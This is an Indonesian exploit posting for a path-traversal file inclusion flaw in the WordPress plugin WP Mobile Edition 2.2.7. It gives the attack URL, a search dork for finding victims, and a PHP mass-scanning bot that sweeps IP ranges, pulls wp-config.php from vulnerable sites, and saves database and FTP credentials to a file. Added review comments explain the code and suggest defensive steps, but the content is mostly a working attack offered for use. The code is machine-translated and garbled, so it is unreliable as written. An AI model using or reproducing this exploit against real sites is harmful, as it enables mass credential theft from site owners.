Plugin WordPress 'WP Mobile Edition' LFI Vulnerability

chmood


#######################################
# Exploit Judul: WordPress Plugin 'WP Mobile Edition' LFI Vulnerability #
# Tanggal: 6 Juni 2015 #
# Exploit Penulis: Virus OS #
# Google Dork: iilnurl:? Fdx_switcher = Mobe #
# Penjual Homepage: https://wordpress.org/plugins/wp-mobile-edition/ #
# Software Link: https://downloads.wordpress.org/plugin/wp-mobile-edition.2.2.7.zip #
# Versi: WP Mobile Edition Versi 2.2.7 #
# Diuji pada: Windows #
########################################
Keterangan:
WordPress Plugin 'WP Mobile Edition' tidak menyaring data sehingga kita bisa mendapatkan file konfigurasi di path berikut:
<Site.com/wp-content/themes/mTheme-Unus/css/css.php?files = .. / .. / .. / .. / wp-config.php>

# Exploite Kode:
<? php
// Virus OS
// Review note: this listing is a machine-translated copy of the published
// script (keywords and concatenation operators are displaced), so it is not
// runnable as shown. It is kept byte-for-byte and only annotated here.
// What the text shows the loop doing: read a target address from STDIN, keep
// its first three octets, and for each of the 256 hosts in that range collect
// WordPress sites from a web search, request css.php under
// wp-content/themes/mTheme-Unus/css/ with a traversal value in the query
// string, and when the response contains DB_HOST print the DB_* constants
// and append them to exploited.txt (FTP_* constants when present).
// Defender notes: the only thing a targeted site observes is a GET for that
// css.php with "../" in its query parameter — that is the string to key
// WAF rules and access-log searches on. A site that answered has had its
// database credentials disclosed: rotate DB_PASSWORD (and FTP_PASS if
// defined in wp-config.php) and remove or update the plugin (the fixed
// version is not stated on this page). On the operator side the run leaves
// exploited.txt and cookie.txt in the working directory.
set_time_limit (0);
error_reporting (0);
echo "############### Fdx_Switcher Minibot Dengan ip Rentang ################## \ n \ n";
print "Kode By _
__ _ (_) _ __ _ _ ___ ___ ___
\ \ / / | '__ | | | / __ | / _ \ / __ |
\ V / | | | | | _ | \ __ \ | (_) \ __ \
\ _ / | _ | _ | \ __, _ | ___ / \ ___ / | ___ /
Menyapa >> CoderLeeT | Fallag Gassrini | Taz | S4hk | Sir Matrix | Kuroi'SH
";
echo "Follow Me On FaceBook: https://www.facebook.com/VirusXOS\n\n";
echo "Follow Me On FaceBook: https://www.facebook.com/Weka.Mashkel007\n\n";
echo "#################### Selamat Guru Virus OS ################ \ n \ n";
echo "Server Sasaran IP:";
// Target address is read from STDIN; the fourth octet is discarded below and
// replaced by the loop counter, so the whole /24 is walked.
$ ip = trim (fgets (STDIN, 1024));
$ ip = meledak (, $ ip '.');
. '.'.. '.'. $ ip = $ ip [0] $ ip [1] $ ip [2]. '.';
untuk ($ i = 0; $ i <= 255; $ i ++)
{
// Host list for this address comes from the search helper (bing) mapped
// through situs(), then de-duplicated.
$ situs = array_map ("situs", bing ("ip: $ ip $ i wordpress."));
$ un = array_unique ($ situs);
echo "[+] Scanning ->", $ ip $ i, "\ n";. "."
echo "Ditemukan:" Count ($ situs) "situs \ n \ n";.
foreach ($ un sebagai $ pok) {
// NOTE(review): $file is read here before it is assigned for this host
// (it is fetched a few lines down), so these four values are stale or
// undefined on the first pass; the later prints recompute them.
$ host = findit ($ file, "DB_HOST ','", "');");
$ db = findit ($ file, "DB_NAME ','", "');");
$ kita = findit ($ file, "DB_USER ','", "');");
$ pw = findit ($ file, "DB_PASSWORD ','", "');");
$ bda = "http: // $ pok";
$ linkof = '/ wp-content / themes / mTheme-Unus / css / css.php file = .. / .. / .. / .. / wp-config.php?';
$ dn = ($ bda) ($ linkof).;
// Errors from the fetch are suppressed with @, so an unreachable host just
// falls through to the "failed" branch below.
$ file = @ file_get_contents ($ dn);
// Branch on whether the fetched text looks like wp-config.php (DB_HOST) and
// whether it additionally carries FTP_* constants.
if (eregi ('DB_HOST', $ file) dan! eregi ('FTP_USER', $ file)) {
.. echo "[+] Scanning =>" $ bda "\ n \ n";
echo "[+] DB NAME:" .findit ($ file, "DB_NAME ','", "');") "\ n \ n";.
echo "[+] DB USER:" .findit ($ file, "DB_USER ','", "');") "\ n \ n";.
echo "[+] DB LULUS:". .findit ($ file, "DB_PASSWORD ','", "');") "\ n \ n";
echo "[+] DB host:" .findit ($ file, "DB_HOST ','", "');") "\ n \ n";.
$ db = "[+] DB NAME:". .findit ($ file, "DB_NAME ','", "');") "\ n \ n";
$ user = "[+] DB PENGGUNA:". .findit ($ file, "DB_USER ','", "');") "\ n \ n";
$ pass = "[+] DB LULUS:". .findit ($ file, "DB_PASSWORD ','", "');") "\ n \ n";
$ host = "[+] DB host:". .findit ($ file, "DB_HOST ','", "');") "\ n \ n";
$ ux = "" $ bda.. "\ r \ n";
$ ux1 = "". $ db. "\ r \ n";
$ UX2 = "" $ user.. "\ r \ n";
$ ux3 = "". $ lulus. "\ r \ n";
$ ux4 = "" $ host.. "\ r \ n";
// Results are appended ('ab') to exploited.txt in the working directory;
// the handle is never closed in this listing.
$ menyelamatkan = fopen ('exploited.txt', 'ab');
fwrite ($ simpan, "$ ux");
fwrite ($ simpan, "$ ux1");
fwrite ($ simpan, "$ UX2");
fwrite ($ simpan, "$ ux3");
fwrite ($ simpan, "$ ux4");
}
elseif (eregi ('DB_HOST', $ file) dan eregi ('FTP_USER', $ file)) {
// FTP_* branch only prints; nothing is written to the file here.
echo "user FTP:" .findit ($ file, "FTP_USER ','", "');") "\ n \ n";.
echo "FTP lulus:" .findit ($ file, "FTP_PASS ','", "');") "\ n \ n";.
echo "FTP host:" .findit ($ file, "FTP_HOST ','", "');") "\ n \ n";.
}
else {echo $ bda ": Eksploitasi gagal \ n \ n";.}
}
}
Fungsi findit ($ mytext, $ StartTag, $ EndTag) {
// Returns the part of $mytext between the first (case-insensitive)
// occurrence of $StartTag and the next $EndTag after it. Callers pass the
// define() fragments of wp-config.php so the result is the constant's value.
// NOTE(review): neither stripos() result is checked for false, so a missing
// tag yields an offset computed from position 0 rather than an error.
$ posLeft = stripos ($ mytext, $ StartTag) + strlen ($ StartTag);
$ posRight = stripos ($ mytext, $ EndTag, $ posLeft + 1);
pulang substr ($ mytext, $ posLeft, $ posRight- $ posLeft);
}
situs function ($ link) {
// Reduces a result URL to its host component (parse_url with PHP_URL_HOST)
// with spaces removed; used as the array_map callback over search results.
kembali str_replace ("", "", parse_url ($ link PHP_URL_HOST));
}
Fungsi bing ($ apa) {
// Pages through a web search for the query, ten results per page up to
// first=2000, collects the hrefs matched in each page's HTML, and stops
// early when the page lacks the "sw_next" marker. Returns the url-decoded,
// de-duplicated links, or nothing when no link was collected.
// Notes for the reader: TLS verification is disabled and cookies are stored
// in cookie.txt under the working directory; the search engine, not the
// targeted site, is the only party that sees this traffic.
untuk ($ i = 1; $ i <= 2000; $ i + = 10) {
$ ch = curl_init ();
curl_setopt ($ ch, CURLOPT_URL, "http://www.bing.com/search?q=".urlencode($what)."&first=".$i."&FORM=PERE");
curl_setopt ($ ch, CURLOPT_USERAGENT, "msnbot / 1.0 (http://search.msn.com/msnbot.htm)");
curl_setopt ($ ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ ch, CURLOPT_COOKIEFILE, getcwd () '/ cookie.txt'.);
curl_setopt ($ ch, CURLOPT_COOKIEJAR, getcwd () '/ cookie.txt'.);
curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ ch, CURLOPT_FOLLOWLOCATION, 1);
$ data = curl_exec ($ ch);
preg_match_all ('#;? a = (*) "h =" #.', $ data, $ link);
foreach ($ link [1] sebagai $ link) {
$ allLinks [] = $ Link;
}
jika istirahat (preg_match ('# "sw_next" #', $ data)!);
}

// Only returns when at least one link was gathered; otherwise the function
// ends without a return value.
if (! empty ($ allLinks) && is_array ($ allLinks)) {
kembali array_unique (array_map ("urldecode", $ allLinks));
}
}

?>
